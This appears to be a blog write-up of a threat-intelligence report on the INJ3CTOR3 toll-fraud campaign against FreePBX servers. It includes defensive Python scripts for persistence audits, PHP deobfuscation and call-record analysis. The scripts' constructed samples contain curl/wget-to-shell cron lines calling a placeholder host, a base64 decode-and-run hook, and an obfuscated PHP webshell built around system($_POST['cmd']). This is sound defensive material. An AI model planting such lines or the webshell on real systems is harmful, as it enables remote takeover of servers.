
Introduction
A large-scale and highly coordinated cyber exploitation campaign is currently targeting FreePBX VoIP systems worldwide, aiming to enable telecom toll fraud on an industrial level. Security researchers have linked the operation to a financially motivated threat actor known as INJ3CTOR3, active since 2019. The campaign demonstrates a significant evolution in attack sophistication, combining newly discovered PHP-based webshells with established malicious toolsets to maintain persistent access and monetize compromised VoIP infrastructure. With automated exploitation spanning multiple regions and cloud providers, this campaign highlights how vulnerable telephony systems remain a prime target for organized cybercrime groups.
Campaign Summary
The ongoing exploitation campaign against FreePBX infrastructure represents one of the most structured VoIP-focused cybercrime operations observed in recent years. Cyble Research & Intelligence Labs (CRIL) attributes the activity with high confidence to the threat actor INJ3CTOR3, a financially driven group active since 2019 and known for telecom fraud operations. The attackers have introduced a previously undocumented PHP webshell family named JOMANGY, which operates alongside the older ZenharR toolset to maintain system control. Each deployed webshell is not only a remote access tool but also contains embedded VoIP toll fraud logic, allowing attackers to route calls through compromised SIP trunks, effectively billing victims for unauthorized international or premium-rate calls.
Infrastructure analysis revealed a command-and-control system managing an inventory of 3,080 IP addresses, indicating extensive automated scanning and exploitation across global networks. Approximately 39 percent of these nodes are associated with Alibaba Cloud, suggesting heavy reliance on large-scale cloud hosting to distribute malicious infrastructure. Targeted regions include Asia-Pacific, Latin America, and the Middle East, demonstrating a global attack footprint rather than a localized campaign.
Once inside a FreePBX system, the attacker deploys a Bash-based dropper that executes a carefully designed host takeover process. It aggressively removes competing malware, deleting files that match more than 50 known webshell signatures and blocking at least 11 rival C2 servers. It also cleans up remnants from earlier INJ3CTOR3 operations, effectively migrating already-infected systems into a newly controlled botnet environment hosted in the Netherlands.
Persistence is achieved through multiple layers of redundancy. The attackers create 18 system accounts: nine UID-0 (root-equivalent) accounts with names chosen to blend into normal system activity, and eight service-level accounts that share an identical password hash pattern. The infection also uses a six-layer persistence architecture that restores the malware even if part of it is removed. This includes cron jobs that poll for payloads every one to three minutes (and so survive a reboot) and modifications to bash profile files that re-execute the malicious code whenever a user logs in.
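The indicators in the paragraph above (extra UID-0 accounts, accounts sharing one password hash, minute-level cron polling that pipes a download into a shell, and download-and-execute hooks in login profiles) are all cheap to check on a suspect host. The script below is an added example written for this page, not tooling from the campaign reports; the /etc/passwd, /etc/shadow, crontab and .bash_profile contents are constructed samples, and the account names, hash strings and the 198.51.100.10 URL are invented for the demo.

```python
"""Audit a FreePBX host for the persistence layers described above.

Added example: not from the campaign reports. All sample file contents are
constructed; on a live box replace the constants with open(path).read().
"""
import re
from collections import defaultdict

# Constructed sample: legitimate root and asterisk users plus two UID-0
# accounts named to look like daemons (names invented for the demo).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
asterisk:x:995:992:Asterisk:/var/lib/asterisk:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
syslogd:x:0:0::/var/log:/bin/bash
daemon1:x:0:0::/tmp:/bin/bash
svc1:x:1001:1001::/home/svc1:/bin/bash
svc2:x:1002:1002::/home/svc2:/bin/bash
"""

# Constructed sample: three attacker accounts reuse one password hash.
SAMPLE_SHADOW = """\
root:$6$abc$ROOTHASH:19900:0:99999:7:::
asterisk:!!:19900:0:99999:7:::
syslogd:$6$zz$SAMEHASH:19900:0:99999:7:::
svc1:$6$zz$SAMEHASH:19900:0:99999:7:::
svc2:$6$zz$SAMEHASH:19900:0:99999:7:::
"""

# Constructed sample: one legitimate nightly job and two 1-2 minute pollers.
SAMPLE_CRONTAB = """\
# legitimate FreePBX housekeeping
0 2 * * * /usr/sbin/fwconsole backup --id=1
*/2 * * * * curl -s http://198.51.100.10/p.sh | sh
* * * * * wget -qO- http://198.51.100.10/p.sh | bash
"""

# Constructed sample: a login profile with a decode-and-run hook appended.
SAMPLE_PROFILE = """\
# .bash_profile
PATH=$PATH:$HOME/bin
export PATH
echo aGVsbG8= | base64 -d | bash
"""

# Download-piped-to-shell or base64-decode-and-run command patterns.
FETCH_AND_RUN = re.compile(r"(curl|wget).*\|\s*(ba)?sh\b|base64\s+(-d|--decode)")


def uid0_accounts(passwd_text):
    """Return account names with UID 0 other than 'root' (extra root-equivalents)."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


def shared_password_hashes(shadow_text):
    """Map each password hash used by more than one account to those accounts."""
    by_hash = defaultdict(list)
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw = fields[0], fields[1]
        if pw.startswith("$"):  # skip locked ('!', '!!', '*') and empty entries
            by_hash[pw].append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def _minute_interval(minute_field):
    """Polling interval in minutes for a crontab minute field ('*' or '*/N'), else None."""
    if minute_field == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return int(m.group(1)) if m else None


def high_frequency_fetchers(cron_text, max_minutes=3):
    """Cron lines that run at least every `max_minutes` and pipe a download into a shell."""
    hits = []
    for line in cron_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)  # five schedule fields + command
        if len(parts) < 6:
            continue
        interval = _minute_interval(parts[0])
        if interval is not None and interval <= max_minutes and FETCH_AND_RUN.search(parts[5]):
            hits.append(line)
    return hits


def profile_hooks(profile_text):
    """Lines in a login profile that decode or download-and-execute code."""
    return [line.strip() for line in profile_text.splitlines() if FETCH_AND_RUN.search(line)]


if __name__ == "__main__":
    print("extra UID-0 accounts:", uid0_accounts(SAMPLE_PASSWD))
    print("shared password hashes:", shared_password_hashes(SAMPLE_SHADOW))
    print("high-frequency fetchers:", high_frequency_fetchers(SAMPLE_CRONTAB))
    print("profile hooks:", profile_hooks(SAMPLE_PROFILE))
```

Run it against /etc/passwd, /etc/shadow, every crontab under /etc/cron.d and /var/spool/cron, and the profile files of every account with a shell; a single hit in any of the four categories on a PBX is enough to justify isolating the host, since the dropper described above plants all of them together.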
Although the initial infection vector has not been definitively confirmed, forensic analysis points to two likely FreePBX vulnerabilities: CVE-2025-64328, a post-authentication command injection flaw in the filestore module, and CVE-2025-57819, a pre-authentication SQL injection vulnerability in the Endpoint module. Log evidence also shows the attackers reusing proof-of-concept code published by security researchers, indicating rapid weaponization of public exploits.
The JOMANGY webshell itself uses multi-layer obfuscation, combining base64 encoding with ROT13 (PHP's str_rot13) transformation to hide the PHP execution chain. The payload structure is frequently rotated, allowing it to bypass traditional signature-based antivirus detection during initial deployment. Attribution to INJ3CTOR3 is reinforced by consistent infrastructure overlap, shared operational patterns, and similarities to command-and-control frameworks previously documented by Fortinet, Palo Alto Networks Unit 42, Check Point Research, and the SANS Internet Storm Center.
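A base64-plus-ROT13 chain defeats byte signatures because the same body re-encodes to a different blob every time the layer order or the inner text changes, but the wrapper functions themselves are visible and reversible. The following added example (written for this page, not JOMANGY's code, whose exact structure is not published here) builds a two-layer sample webshell at runtime from a constructed `system($_POST['cmd']);` body, then peels the layers back by applying the inverse of each PHP wrapper from the innermost call outward. It also handles `gzinflate` as a generalization beyond what the page describes.

```python
"""Peel base64 / str_rot13 / gzinflate wrapper chains from PHP source.

Added example, not the JOMANGY code. The sample webshell is constructed
here by wrapping an invented body twice, with the layer order swapped
between layers to mirror the payload rotation described above.
"""
import base64
import codecs
import re
import zlib

# A run of function calls around a single string literal, e.g.
#   eval(str_rot13(base64_decode('...')))
CHAIN = re.compile(r"((?:\w+\s*\(\s*)+)(['\"])([^'\"]*)\2\s*\)+")


def _php_base64(s):
    return base64.b64encode(s.encode("latin-1")).decode("ascii")


def _php_rot13(s):
    return codecs.decode(s, "rot_13")


# Constructed sample: layer 1 is eval(str_rot13(base64_decode(L))) with
# L = base64(rot13(body)); layer 2 swaps the order of the two transforms.
INNER = "system($_POST['cmd']);"
LAYER1 = "eval(str_rot13(base64_decode('%s')));" % _php_base64(_php_rot13(INNER))
SAMPLE_WEBSHELL = "<?php eval(base64_decode(str_rot13('%s'))); ?>" % _php_rot13(_php_base64(LAYER1))


def decode_chain(funcs, literal):
    """Apply the inverse of each wrapper, innermost (last in the list) first.

    Strings are kept as latin-1 text so binary gzinflate output survives.
    """
    data = literal
    for fn in reversed(funcs):
        if fn == "eval":
            continue  # eval is the sink, not a transform
        if fn == "base64_decode":
            data = base64.b64decode(data).decode("latin-1")
        elif fn == "str_rot13":
            data = codecs.decode(data, "rot_13")
        elif fn == "gzinflate":
            data = zlib.decompress(data.encode("latin-1"), -15).decode("latin-1")
        else:
            raise ValueError("unknown wrapper: %s" % fn)
    return data


def peel(php_source, max_layers=10):
    """Return (final plaintext, list of wrapper chains) after peeling all layers."""
    layers = []
    current = php_source
    for _ in range(max_layers):
        m = CHAIN.search(current)
        if not m:
            break
        funcs = re.findall(r"\w+", m.group(1))
        layers.append(funcs)
        current = decode_chain(funcs, m.group(3))
    return current, layers


def is_suspicious(php_source):
    """True when any layer feeds a decoded string literal into eval."""
    _, layers = peel(php_source)
    return any("eval" in funcs and len(funcs) >= 2 for funcs in layers)


if __name__ == "__main__":
    plain, layers = peel(SAMPLE_WEBSHELL)
    print("obfuscated:", SAMPLE_WEBSHELL)
    print("layers:", layers)
    print("plaintext:", plain)
    print("suspicious:", is_suspicious(SAMPLE_WEBSHELL))
```

Point this at files under the FreePBX web root and flag anything `is_suspicious` reports, then read the peeled plaintext rather than the blob. The regex only follows direct call-around-literal nesting; variable functions, string concatenation or `preg_replace` with the `e` modifier need a real PHP parser, so treat this as triage, not as a complete detector.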
What Undercode Say:
This campaign represents a clear evolution in VoIP-targeted cybercrime, shifting from opportunistic exploitation to fully industrialized telecom fraud operations.
The integration of live toll fraud logic directly into webshell payloads shows a merging of intrusion tooling and monetization mechanisms in real time.
Rather than bolting a separate monetization stage onto a compromise after the fact, attackers now embed revenue generation directly into the access tool itself.
The use of six-layer persistence indicates a strong emphasis on survivability over stealth alone.
Even partial cleanup efforts are unlikely to remove the infection due to redundant recovery mechanisms.
The deliberate eviction of competing malware suggests this is a contested underground ecosystem, not a single-actor environment.
The attackers are effectively monopolizing compromised VoIP infrastructure for financial control.
Cloud abuse, especially through major providers, highlights how legitimate infrastructure is being weaponized at scale.
This also makes attribution and takedown significantly more complex for defenders.
The rotation of payload encoding techniques reduces the effectiveness of static detection systems.
Security tools relying only on signature matching are likely insufficient against this campaign.
Behavior-based detection becomes essential, particularly around SIP trunk anomalies.
The campaign’s geographic spread shows that FreePBX deployments are globally exposed, not regionally isolated.
Use of multiple CVEs suggests parallel exploitation attempts rather than reliance on a single vulnerability.
This increases the likelihood of successful compromise across different patch levels.
The presence of cleanup routines from earlier campaigns shows long-term operational continuity.
This is not a one-off intrusion but part of an evolving botnet lifecycle.
The inclusion of system-level accounts indicates deep privilege escalation success.
Once root access is achieved, attackers maintain near-complete control over telephony routing.
The monetization model is simple but effective: the victim's carrier bills the victim for the fraudulent traffic.
This creates direct financial damage without requiring data exfiltration.
Telecom infrastructure becomes both the target and the tool of exploitation.
Detection delay significantly increases financial losses in such scenarios.
Incident response must prioritize SIP traffic monitoring and account auditing.
Traditional endpoint security alone is insufficient in this environment.
Network-layer visibility becomes critical for early detection.
Cloud-hosted command infrastructure complicates takedown operations.
The campaign demonstrates strong operational maturity and automation.
It reflects a shift toward scalable cybercrime-as-infrastructure models.
Long-term mitigation will require coordinated vendor and carrier response.
Without it, similar campaigns are likely to persist and expand.
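The points above about SIP trunk anomalies and detection delay come down to one practical control: reading the PBX's own call detail records for the shape of toll fraud, which is a burst of long, after-hours calls from one extension to international or premium-rate numbers. The script below is an added example for this page, not something from the reports it summarizes; it parses Asterisk's cdr-csv Master.csv column layout and runs two checks over a constructed sample. The business-hours window, the burst threshold and the international dial-prefix pattern are assumptions to tune per site.

```python
"""Flag toll-fraud patterns in Asterisk CDR CSV records.

Added example, not from the campaign reports. SAMPLE_CDR is constructed:
two normal daytime calls, then six calls at 03:00 from extension 1002 to
an invented international number. Thresholds are assumptions.
"""
import csv
import io
import re
from collections import Counter, defaultdict
from datetime import datetime

# Column order of Asterisk's cdr-csv Master.csv.
CDR_FIELDS = ["accountcode", "src", "dst", "dcontext", "clid", "channel", "dstchannel",
              "lastapp", "lastdata", "start", "answer", "end", "duration", "billsec",
              "disposition", "amaflags", "uniqueid", "userfield"]

SAMPLE_CDR = """\
"","1001","5551234567","from-internal","Alice <1001>","PJSIP/1001-00000001","PJSIP/trunk-00000002","Dial","PJSIP/5551234567@trunk,30","2025-11-20 09:15:02","2025-11-20 09:15:10","2025-11-20 09:20:10","308","300","ANSWERED","3","1763629502.1",""
"","1003","5559876543","from-internal","Bob <1003>","PJSIP/1003-00000003","PJSIP/trunk-00000004","Dial","PJSIP/5559876543@trunk,30","2025-11-20 14:02:11","2025-11-20 14:02:15","2025-11-20 14:12:15","604","600","ANSWERED","3","1763646931.3",""
"","1002","011252612345678","from-internal","1002 <1002>","PJSIP/1002-00000005","PJSIP/trunk-00000006","Dial","PJSIP/011252612345678@trunk,30","2025-11-21 03:01:00","2025-11-21 03:01:05","2025-11-21 03:31:05","1805","1800","ANSWERED","3","1763693660.5",""
"","1002","011252612345678","from-internal","1002 <1002>","PJSIP/1002-00000007","PJSIP/trunk-00000008","Dial","PJSIP/011252612345678@trunk,30","2025-11-21 03:02:00","2025-11-21 03:02:05","2025-11-21 03:32:05","1805","1800","ANSWERED","3","1763693720.7",""
"","1002","011252612345678","from-internal","1002 <1002>","PJSIP/1002-00000009","PJSIP/trunk-00000010","Dial","PJSIP/011252612345678@trunk,30","2025-11-21 03:03:00","2025-11-21 03:03:05","2025-11-21 03:33:05","1805","1800","ANSWERED","3","1763693780.9",""
"","1002","011252612345678","from-internal","1002 <1002>","PJSIP/1002-00000011","PJSIP/trunk-00000012","Dial","PJSIP/011252612345678@trunk,30","2025-11-21 03:04:00","2025-11-21 03:04:05","2025-11-21 03:34:05","1805","1800","ANSWERED","3","1763693840.11",""
"","1002","011252612345678","from-internal","1002 <1002>","PJSIP/1002-00000013","PJSIP/trunk-00000014","Dial","PJSIP/011252612345678@trunk,30","2025-11-21 03:05:00","2025-11-21 03:05:05","2025-11-21 03:35:05","1805","1800","ANSWERED","3","1763693900.13",""
"","1002","011252612345678","from-internal","1002 <1002>","PJSIP/1002-00000015","","Dial","PJSIP/011252612345678@trunk,30","2025-11-21 03:06:00","","2025-11-21 03:06:30","30","0","NO ANSWER","3","1763693960.15",""
"""

# Assumed international dial pattern: 011 (NANP), 00 (ITU) or + prefix.
INTERNATIONAL = re.compile(r"^(?:011|00|\+)\d{7,}$")


def parse_cdr(csv_text):
    """Parse CSV rows into dicts keyed by CDR_FIELDS, dropping malformed rows."""
    rows = csv.reader(io.StringIO(csv_text))
    return [dict(zip(CDR_FIELDS, row)) for row in rows if len(row) == len(CDR_FIELDS)]


def flag_toll_fraud(records, business_hours=(8, 18), burst_threshold=5):
    """Return after-hours international calls, bursty sources and billed seconds per source."""
    after_hours_intl = []
    per_src_hour = Counter()
    intl_billsec = defaultdict(int)
    for r in records:
        start = datetime.strptime(r["start"], "%Y-%m-%d %H:%M:%S")
        if INTERNATIONAL.match(r["dst"]):
            intl_billsec[r["src"]] += int(r["billsec"] or 0)
            if not business_hours[0] <= start.hour < business_hours[1]:
                after_hours_intl.append(r["uniqueid"])
        # Attempts count too: unanswered calls are still probing the trunk.
        per_src_hour[(r["src"], start.strftime("%Y-%m-%d %H"))] += 1
    bursty = {src: n for (src, _), n in per_src_hour.items() if n >= burst_threshold}
    return {"after_hours_international": after_hours_intl,
            "bursty_sources": bursty,
            "international_billsec_by_src": dict(intl_billsec)}


if __name__ == "__main__":
    findings = flag_toll_fraud(parse_cdr(SAMPLE_CDR))
    for key, value in findings.items():
        print(key, "->", value)
```

On a FreePBX box the same columns are available from the CDR database rather than Master.csv (the start time is named `calldate` there), so a nightly dump piped through `flag_toll_fraud` gives the early warning the commentary above calls for; a non-empty `bursty_sources` or any `after_hours_international` entry from an extension that never dials abroad is the moment to disable that extension's outbound route and pull the host for the account and cron audit.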
Fact Checker Results
✅ Attribution aligns with multi-vendor cybersecurity reporting and known INJ3CTOR3 activity patterns
⚠️ CVE-2025-57819 was disclosed by Sangoma in August 2025 as already exploited in the wild; that this campaign uses it, and that CVE-2025-64328 is being weaponized at all, is inferred from forensic traces rather than confirmed
❌ The 3,080-address inventory is attacker-side infrastructure data; no independent confirmation of how many FreePBX hosts are actually compromised is provided
Prediction
INJ3CTOR3 or related groups will likely continue refining automated FreePBX exploitation chains, increasing speed from vulnerability discovery to monetization.
Future variants of JOMANGY may include stronger anti-forensics and faster self-healing mechanisms.
Telecom providers may begin enforcing stricter SIP anomaly detection and authentication hardening.
If unpatched FreePBX deployments remain widespread, similar toll fraud campaigns are expected to expand further in scope and financial impact.
References:
Reported By: cyberpress.org